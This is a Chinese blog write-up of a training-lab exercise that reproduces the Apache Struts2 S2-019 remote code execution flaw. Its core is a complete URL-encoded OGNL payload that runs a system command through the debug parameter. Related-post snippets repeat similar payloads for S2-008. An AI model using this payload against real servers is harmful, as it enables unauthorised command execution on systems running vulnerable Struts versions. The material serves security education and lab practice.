墨者学院-Apache Struts2远程代码执行漏洞(S2-019)复现

最新推荐文章于 2021-07-08 22:15:14 发布
最新推荐文章于 2021-07-08 22:15:14 发布
阅读量1.1k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39998158/article/details/100539393
版权

Apache Struts2远程代码执行漏洞(S2-019)复现

难易程度:★★
题目类型:命令执行
使用工具:FireFox浏览器

漏洞原理:默认情况下禁用动态方法调用导致的命令执行。

1.打开靶场,搜索一下S2-019漏洞原理。

2.构造POC,执行命令ls查看文件。
进行url二次编码。
?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField(%27allowStaticMethodAccess%27)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B’ls’%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close()
访问http://ip/showcase.action+poc

最低0.47元/天 解锁文章
JimWu95
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
S2-008漏洞
baidu_38844729的博客
11-14 840
环境搭建 使用docker进行漏洞环境搭建,有关docker的安装和镜像部署可以参考我前面的博客 docker-compose build docker-compose up -d 漏洞利用 命令执行EXP http://localhost:8080/devmode.action?debug=command&expression=%23context%5B%22xwork.Method...
Apache Struts2远程代码执行漏洞(S2-019)
qq_36933272的博客
09-03 2441
动态方法调用是一种已知会施加可 Apache Struts2远程代码执行漏洞(S2-019)能的安全漏洞的机制,但到目前为止,它默认启用,警告用户应尽可能将其关闭。 S2-019的poc,是debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField(‘allowStaticMethodAccess’),#...
Apache Struts 远程代码执行漏洞(CVE-2013-4316)
weixin_30316097的博客
09-26 922
漏洞版本: Apache Group Struts < 2.3.15.2 漏洞描述: BUGTRAQ ID: 62587 CVE(CAN) ID: CVE-2013-4316 Struts2 是第二代基于Model-View-Controller (MVC)模型的java企业级web应用框架。 Apache Struts 2.3.15.2之前版本的“Dyna...
0x26.Apache Struts2远程代码执行漏洞(S2-019)
qq_31679787的博客
10-21 927
s2-019:动态方法调用是一种已知会施加可能的安全漏洞的机制,但到目前为止,它默认启用,警告用户应尽可能将其关闭; 构造poc: ?debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set...
S2-019、S2-020
weixin_30564901的博客
05-05 632
前言 “Struts2系列起始篇”是我整各系列的核心,希望大家能花些时间先看看。 正文 我发关于一些早期的Struts2的漏洞,网上的分析文章并不多,不知道是不是我打开浏览器的方式不对,唯一看到的两篇文章也仅有poc,没有细节分析。于是我在官方上看了下漏洞详情,如下: 大概意思是动态方法调用开启了会导致安全问题,给出的信息太少了,于是我又看了下网上的po...
structs 2 2013 S2-019漏洞方法
zhaozhanyong的专栏
01-13 3338
1、升级structs 2到2.3.15.3版本 2、如果漏洞还存在 关 debug模式,请关一下,Apache Struts 2的Dynamic Method Invocation,也关一下
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
2. **Javaweb-Struts2框架类RCE漏洞**:Struts2框架中的某些版本存在远程代码执行漏洞,通过精心构造的请求,攻击者可以执行任意Java代码。 3. **一句话Webshell后门**:这是一种简单的Web后门,仅用一行代码即可...
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
通关攻略墨者靶场 post ,DB2,绕过登录,sql注入四关
Web常见漏洞描述及修建议
java_java_cl的博客
07-17 1757
Web常见漏洞描述及修建议(Description of common Web vulnerabilities and Suggestions for fixingthem)-来自:https://www.cnblogs.com/iAmSoScArEd/p/10651947.html-我超怕的 1.SQL注入   漏洞描述   Web程序中对于用户提交的参数未做过滤直接拼接到SQL语句中执行,导致参数中的特殊字符破坏了SQL语句原有逻辑,攻击者可以利用该漏洞执行任意SQL语句,如查询数据、下载数据.
【vulhub】S2-008漏洞
qq_45300786的博客
07-08 421
poc http://192.168.100.23:8080/devmode.action?debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true
ref:Struts2 命令执行系列回顾
weixin_30266885的博客
06-21 955
ref:http://www.zerokeeper.com/vul-analysis/struts2-command-execution-series-review.html Struts2 命令执行系列回顾 Jun 05,2017in漏洞分析lang繁read (3897) 一直都想分析下 Struts2 命令执行系列的的漏洞,但是能力有限,对 ja...
Struts2的Action接收jsp页面表单数据为null的原因及解决方法
Yuwen_forJava的博客
05-03 2276
学完Struts2后自己写小练习时发,Action获取表单数据的三种方式都不成功,封装数据类型如String结果是null,基本数据类型如double是0。怀疑过各种问题:struts2和spring整合导致的,然后删除spring部分,不行;jsp页面使用了struts2标签,改为普通的,不行。快绝望了。后来发Struts对变量的get和set方法有严格的要求,以get为例,如果你的变量分别...
无语的年会抽奖.......
不是程序员
01-21 4163
首选声明, 做这个完全是想告诉大家安全的重要性, 没有 针对 任何人, 任何事, 请大家务必关注安全领域的信息, 特别是如今的互联网时代, 安全性应该放在第一位.如果不小心发生用户数据泄漏事件, 会对公司的声誉产生不良影响. 就如同我们的操作系统时不时都需要打补丁一样, 每个程序都不是完美的, 有朝一日出一个大bug, 大家应该第一时间做 出反 应, 以免遭遇不必要的损失.就如下我们目前的状况,
这些年被我们玩坏的Xcode -- Xcode debug area 的 debugger command 使用
wliu6的专栏
04-24 2480
Xcode debug area 要这么玩才对~~
墨者学院 - Apache Struts2系列
多崎巡礼的博客
01-11 2483
文章目录struct2-001struct2-004struct2-007struct2-008struct2-009 struct2-001 因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值